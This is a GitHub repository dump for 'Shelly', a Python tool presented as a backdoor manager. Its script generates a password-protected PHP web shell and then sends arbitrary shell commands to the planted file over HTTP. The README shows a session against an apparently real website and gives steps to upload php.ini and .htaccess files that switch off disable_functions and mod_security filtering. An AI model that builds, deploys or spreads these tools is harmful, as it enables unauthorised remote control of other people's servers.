├── Disable_Functions Bypass
├── php.ini
└── .htaccess
├── requirements.txt
├── capture
├── capture.png
├── capture-2.png
└── capture-3.png
├── config.ini
├── .github
└── FUNDING.yml
├── LICENSE
├── shell.py
└── README.md
/Disable_Functions Bypass/php.ini:
--------------------------------------------------------------------------------
1 | safe_mode = OFF
2 | disable_functions = NONE
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | requests==2.20.0
2 | configparser==3.5.0
3 | argparse==1.4.0
4 |
--------------------------------------------------------------------------------
/capture/capture.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/Shelly/HEAD/capture/capture.png
--------------------------------------------------------------------------------
/capture/capture-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/Shelly/HEAD/capture/capture-2.png
--------------------------------------------------------------------------------
/capture/capture-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tegal1337/Shelly/HEAD/capture/capture-3.png
--------------------------------------------------------------------------------
/config.ini:
--------------------------------------------------------------------------------
1 | [DEFAULT]
2 | code=
--------------------------------------------------------------------------------
/Disable_Functions Bypass/.htaccess:
--------------------------------------------------------------------------------
1 |
2 | SecFilterEngine Off
3 | SecFilterScanPOST Off
4 |
5 |
--------------------------------------------------------------------------------
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | # These are supported funding model platforms
2 |
3 | github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
4 | patreon: # Replace with a single Patreon username
5 | open_collective: # Replace with a single Open Collective username
6 | ko_fi: # Ngga tau
7 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
8 | liberapay: # Replace with a single Liberapay username
9 | issuehunt: # Replace with a single IssueHunt username
10 | otechie: # Replace with a single Otechie username
11 | lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry
12 | custom: https://paypal.me/dalpan # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']
13 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2020 TEGAL1337
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/shell.py:
--------------------------------------------------------------------------------
1 | from argparse import ArgumentParser
2 | from configparser import ConfigParser
3 | from requests import get
4 | from time import sleep
5 | from sys import stdout
6 |
7 | print ("""
8 | ______ ____
9 | / __/ / ___ / / __ __
10 | _\ \/ _ / -_/ / / // /
11 | /___/_//_\__/_/_/\_, /
12 | /___/ v.1
13 | --------------------------
14 | Python shell - Tegal1337 |
15 | Generate :
16 | [+] ./shell.py -g "nama_shell" -p "password"
17 | Connect Server :
18 | [+] ./shell.py -u "url_shell" -p "password"
19 | """)
20 |
21 | parser = ArgumentParser()
22 | parser.add_argument("-url", dest="shell_url", action="store",
23 | help="Url Website")
24 | parser.add_argument("-g", dest="generate", action="store",
25 | help="Generate Payload")
26 | parser.add_argument("-p", dest="passwd", action="store",
27 | help="Password Shell")
28 | args = parser.parse_args()
29 |
30 | for x in range(50):
31 | print("/-\|"[x % 4], end="\b")
32 | stdout.flush()
33 | sleep(0.1)
34 |
35 | if args.generate:
36 | if args.passwd:
37 | passwd = str(args.passwd)
38 | else :
39 | passwd = 'tegal1337'
40 |
41 | shell_name = str(args.generate)
42 | shell = shell_name+'.php'
43 | opfile = open(shell, '+w')
44 | config = ConfigParser()
45 | config.read_file(open('config.ini'))
46 |
47 | opfile.write(config['DEFAULT']['code'].replace('{passw}', passwd))
48 | print ('Backdoor berhasil dibuat dengan nama '+ shell + ' dan password ' + passwd)
49 |
50 | if args.shell_url :
51 | pwd = get(args.shell_url + '?passwd=' + args.passwd + '&c=pwd').text.replace("\n", ""
52 | )
53 | pwd += "$ "
54 | while True:
55 | command = input(pwd)
56 | result = get(args.shell_url + '?passwd=' + args.passwd + '&c=' + command).text
57 | print (result)
58 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 | ## Shelly | Simple Backdoor Manager with Python (based on weevely)
3 |
4 | 
5 |
6 | Shelly is a simple tool that is written using Python, which functions to remote a website
7 |
8 | ### Instalation :
9 |
10 | $ git clone https://github.com/tegal1337/Shelly
11 | $ cd Shelly
12 | $ python3 shell.py
13 |
14 | ### Requirements :
15 |
16 |
17 | sudo pip install -r requirements.txt
18 |
19 |
20 | ### Example :
21 |
22 |
23 | python3 shell.py -g wp-log -p tegal1337
24 | ______ ____
25 | / __/ / ___ / / __ __
26 | _\ \/ _ / -_/ / / // /
27 | /___/_//_\__/_/_/\_, /
28 | /___/ v.1
29 | --------------------------
30 | Python shell - Tegal1337 |
31 | Generate :
32 | [+] ./backdoor.py -g "nama_shell" -p "password"
33 | Connect Server :
34 | [+] ./backdoor.py -u "url_shell" -p "password"
35 |
36 | Backdoor berhasil dibuat dengan nama wp-log.php dan password tegal1337
37 |
38 | dalpan@Tegal1337:~/Tools$ python3 shell.py -u "https://www.pamz3d.com/wp-log.php" -p tegal1337
39 | /opt/lampp/htdocs/php-futsal$ id
40 | uid=501(pamz3d) gid=501(pamz3d) groups=501(pamz3d)
41 |
42 | 
43 | 
44 |
45 | ### Disable Function Bypass :
46 |
47 | - look for the folder whose permissions 777 (rwx rwx rwx)
48 | - Upload file php.ini
49 |
50 |
51 | safe_mode = OFF
52 | disable_functions = NONE
53 |
54 |
55 | - And upload file .htaccess
56 |
57 |
58 |
59 | SecFilterEngine Off
60 | SecFilterScanPOST Off
61 |
62 |
63 |
64 |
65 | ### Artikel :
66 |
67 | - https://blog.tegalsec.org/meremote-sebuah-website-menggunakan-backdoor-python/
68 |
69 |
70 | ### Contact :
71 |
72 | - Email : van@tegalsec.org
73 |
74 |
75 | ### Support our organization by giving donations
76 |
77 | [](https://paypal.me/dalpan)
78 |
--------------------------------------------------------------------------------